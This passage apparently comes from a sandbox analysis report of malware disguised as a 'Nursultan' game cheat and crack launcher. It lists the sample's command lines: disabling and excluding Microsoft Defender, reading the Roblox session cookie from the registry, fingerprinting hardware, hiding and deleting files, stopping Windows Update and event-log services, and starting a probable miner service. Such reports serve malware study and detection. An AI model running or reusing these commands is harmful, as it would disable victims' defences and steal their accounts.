        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        35⤵
        
        PID:2564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        35⤵
        Drops file in Drivers directory
        
        PID:900
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        36⤵
        Views/modifies file attributes
        
        PID:1920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        36⤵
        
        PID:2920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        36⤵
        
        PID:1436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        36⤵
        
        PID:2452
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        36⤵
        
        PID:2408
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        36⤵
        
        PID:1484
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        36⤵
        
        PID:1708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        36⤵
        
        PID:1996
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        36⤵
        Detects videocard installed
        
        PID:2304
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        36⤵
        
        PID:1492
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        37⤵
        Runs ping.exe
        
        PID:1908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        35⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:824
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        36⤵
        
        PID:1280
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        35⤵
        Adds Run key to start application
        
        PID:2132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1604
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        36⤵
        
        PID:1720
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        37⤵
        
        PID:2668
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        37⤵
        
        PID:2628
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        38⤵
        
        PID:2732
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        37⤵
        Launches sc.exe
        
        PID:1528
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        37⤵
        Launches sc.exe
        
        PID:2552
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        37⤵
        
        PID:2604
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        37⤵
        Launches sc.exe
        
        PID:2696
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        37⤵
        
        PID:2432
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        37⤵
        Power Settings
        
        PID:2500
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        37⤵
        Power Settings
        
        PID:2584
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        37⤵
        Power Settings
        
        PID:2476
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        37⤵
        Power Settings
        
        PID:1564
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        37⤵
        
        PID:1912
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "XMRKNZQC"
        37⤵
        Launches sc.exe
        
        PID:2848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1128
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        36⤵
        
        PID:1492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        36⤵
        
        PID:2632
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        36⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:764
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        37⤵
        
        PID:2392
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        36⤵
        Adds Run key to start application
        
        PID:2476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        37⤵
        
        PID:1756
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        37⤵
        
        PID:1580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        37⤵
        
        PID:536
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        37⤵
        
        PID:2516
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        38⤵
        Views/modifies file attributes
        
        PID:320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        38⤵
        
        PID:1956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        38⤵
        
        PID:2300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        38⤵
        
        PID:2664
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        38⤵
        
        PID:2408
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        38⤵
        
        PID:2596
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        38⤵
        
        PID:2976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        38⤵
        
        PID:2188
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        38⤵
        Detects videocard installed
        
        PID:1184
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        38⤵
        
        PID:2728
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        39⤵
        Runs ping.exe
        
        PID:1748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        37⤵
        
        PID:744
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        37⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1772
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        38⤵
        
        PID:1436
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        37⤵
        Adds Run key to start application
        
        PID:2868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        38⤵
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        38⤵
        
        PID:2600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2564
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        38⤵
        
        PID:828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        38⤵
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        38⤵
        
        PID:2492
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        39⤵
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        38⤵
        
        PID:2540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2440
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        39⤵
        
        PID:636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2584
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        39⤵
        
        PID:1920
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        40⤵
        Views/modifies file attributes
        
        PID:2536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        40⤵
        
        PID:1600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        40⤵
        
        PID:1464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        40⤵
        
        PID:2212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        40⤵
        
        PID:1756
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        40⤵
        
        PID:1844
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        40⤵
        
        PID:320
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        40⤵
        
        PID:1252
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        40⤵
        
        PID:2844
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        40⤵
        Detects videocard installed
        
        PID:1184
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        40⤵
        
        PID:444
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        41⤵
        Runs ping.exe
        
        PID:804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        39⤵
        
        PID:2884
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        39⤵
        
        PID:912
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        40⤵
        
        PID:2972
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        39⤵
        
        PID:2472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        40⤵
        
        PID:1708
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        40⤵
        
        PID:2724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        40⤵
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        40⤵
        
        PID:340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2420
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        40⤵
        
        PID:692
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        41⤵
        
        PID:2664
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        40⤵
        
        PID:2260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:620
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        41⤵
        
        PID:2476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1564
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        41⤵
        
        PID:2196
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        42⤵
        Views/modifies file attributes
        
        PID:3060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        42⤵
        
        PID:2244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        42⤵
        
        PID:2472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        42⤵
        
        PID:2212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        42⤵
        
        PID:1928
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        42⤵
        
        PID:2160
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        42⤵
        
        PID:2188
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        42⤵
        
        PID:2640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        42⤵
        
        PID:2440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        41⤵
        
        PID:2304
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        41⤵
        
        PID:2724
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        42⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        41⤵
        
        PID:1348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2228
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        42⤵
        
        PID:828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        42⤵
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        42⤵
        
        PID:1052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        42⤵
        
        PID:916
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        42⤵
        
        PID:2964
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        43⤵
        
        PID:1128
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        42⤵
        
        PID:2668

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1728
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1124
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:2484
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  PID:620
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1676
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  PID:868
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:748
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2020
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1992
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:2732
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:352
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1536
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:832
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:772

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1711804874-7777496591000242476779746899-6803831591387546350609943302-272693671"
1⤵
PID:1508

C:\Windows\system32\taskeng.exe
taskeng.exe {DFE328B7-DA1E-4887-BC69-6CFE2FA505EB} S-1-5-21-481678230-3773327859-3495911762-1000:UIBNQNMA\Admin:Interactive:[1]
1⤵
PID:2700
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:2560
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  PID:2880
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  PID:1748

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-4689924641782777413-266793158172245117419680670121237407869-976106841868412108"
1⤵
PID:2720

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-423517510-20372804441232662093-2012653723-1132388869-81976167117760949201421261233"
1⤵
PID:1356

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1517915089-203529756414381706701778594745-1114536970984600384-3077890331987151487"
1⤵
PID:2160

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1435150320-1993992564-746737393-1356410197-8681040651490991474-1776412932-885018815"
1⤵
PID:1056

C:\Windows\system32\conhost.exe
